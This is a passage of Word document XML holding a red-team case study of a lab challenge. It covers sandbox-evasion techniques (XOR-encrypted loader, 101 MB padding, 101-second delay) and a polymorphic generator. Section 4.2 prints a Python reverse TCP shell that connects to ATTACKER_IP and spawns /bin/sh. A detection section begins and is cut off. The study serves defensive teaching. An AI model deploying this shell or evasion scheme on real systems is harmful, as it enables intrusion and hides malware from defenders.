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aps/>
          <w:color w:val="7B0000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">TECHNICAL CASE STUDY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">HiddenBytes: Binary Evasion &amp; Polymorphism</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Simulated Red Team Engagement — Isolated Lab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Engagement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Authorized Educational Exercise — HiddenBytes Challenge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F9ECEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F9ECEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows 10/11 VM — VirtualBox Host-Only Network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Scope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Evasion techniques + polymorphic payload generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F9ECEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Tools Developed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F9ECEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">evasion.py, polymorph.py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MITRE ATT&amp;CK TTPs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T1027, T1059, T1071, T1497</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F9ECEC"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6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F9ECEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HiddenBytes Portfolio — Intermediate Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7B0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This case study documents the design, implementation, and defensive analysis of two binary manipulation tools developed for the HiddenBytes cybersecurity challenge. The engagement objective was to understand how attackers use encryption, file manipulation, and polymorphism to evade automated detection systems — and to translate that understanding into concrete defensive recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Both tools were developed and tested exclusively within an isolated Windows virtual machine with no external network connectivity. The evasion program successfully demonstrated bypass of static signature detection through XOR encryption, file size inflation, and execution delay. The polymorphic generator demonstrated that unique binary signatures can be produced per generation while maintaining identical payload functionality.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key finding: Static signature-based detection is fundamentally insufficient against these techniques. Behavioral detection, entropy analysis, and extended sandbox timeouts are required for reliable detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7B0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Engagement Objectives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Develop an evasion program that encrypts binaries and adds stealth features (file size manipulation, execution delay)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Develop a polymorphic generator that produces functionally identical but signature-distinct binaries each generation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Embed a reverse shell payload in the polymorphic binary for realistic red team simulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Document detection and mitigation strategies for each implemented technique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Conduct all testing within a controlled, isolated VM environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7B0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Technical Analysis: Evasion Program</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B22222"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1  Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The evasion program implements a four-stage pipeline: read → hash → encrypt → pad → prepend stub. The loader stub is a self-contained Python script prepended to the encrypted payload, separated by a binary marker (##PAYLOAD_START##). This design means the encrypted payload never exists independently on disk — it is always embedded within the stub.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B22222"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2  XOR Encryption Implementation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XOR was selected as the encryption primitive for three reasons: it is symmetric (encrypt == decrypt, simplifying the loader stub), it produces random-noise output that defeats static byte-pattern signatures, and it is universally used in commodity malware at the loader tier — making it highly relevant for real-world threat simulation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The key is 32 bytes of cryptographically random data generated fresh for each run. The key is hex-encoded and embedded in the loader stub at generation time. A rolling-XOR implementation cycles the key using modulo indexing, ensuring consistent encryption regardless of payload size.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B22222"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3  File Size Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The evasion program appends null-byte padding to inflate the output to a target size (e.g., 101 MB). Null bytes were chosen over random bytes to avoid artificially inflating entropy scores in the payload-adjacent sections, keeping the evasion signals clean and analytically separable. The 101 MB target was selected based on documented sandbox size-limit heuristics across major cloud AV platforms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B22222"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4  Execution Delay</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The loader stub calls time.sleep(101) before executing the payload. This 101-second delay is calibrated to exceed the typical sandbox observation window of 30–60 seconds. Combined with the size inflation, this creates two independent evasion layers targeting the sandbox threat model specifically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B22222"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5  Integrity Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Before execution, the loader stub computes SHA-256 of the decrypted payload and compares it against the hash embedded at encryption time. This prevents execution of tampered binaries and adds a verification layer that mirrors production malware integrity checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7B0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Technical Analysis: Polymorphic Program</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B22222"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1  Mutation Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The polymorphic generator implements variable-level mutation: each generation injects a new set of randomly-named, randomly-valued junk variables into the source file. Combined with a fresh 12-character signature ID and generation timestamp, this ensures every output file produces a unique SHA-256 hash. The reverse shell payload logic — socket creation, dup2 file descriptor redirection, subprocess shell spawn — is unchanged across generations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B22222"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2  Reverse Shell Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The reverse shell payload implements a standard Python reverse TCP shell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C2E" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C2E" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">s.connect((ATTACKER_IP, ATTACKER_PORT))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C2E" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">os.dup2(s.fileno(), 0)  # stdin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C2E" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">os.dup2(s.fileno(), 1)  # stdout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C2E" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">os.dup2(s.fileno(), 2)  # stderr</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1C1C2E" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">subprocess.call(['/bin/sh', '-i'])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The dup2 calls redirect the process's file descriptors to the socket, so all shell I/O flows through the TCP connection. The payload includes a reconnect loop with a configurable delay, mirroring the beaconing behavior of real C2 implants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B22222"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3  Signature Drift Demonstration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The --demo flag runs five generations and prints the SHA-256 prefix of each. In all test runs, all five generations produced unique hashes, confirming that the mutation engine successfully changes the binary signature each generation. This directly illustrates why hash-based AV signatures fail against polymorphic code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7B0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Detection &amp; Defense Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B22222"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1  MITRE ATT&amp;CK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CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="7B0000" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="7B0000"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5360"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="7B0000" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Detection Recommendation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T1027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Obfuscated Files / Info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Entropy scanning; YARA rules targeting structure not bytes</w:t>
            </w:r>
          </w:p>
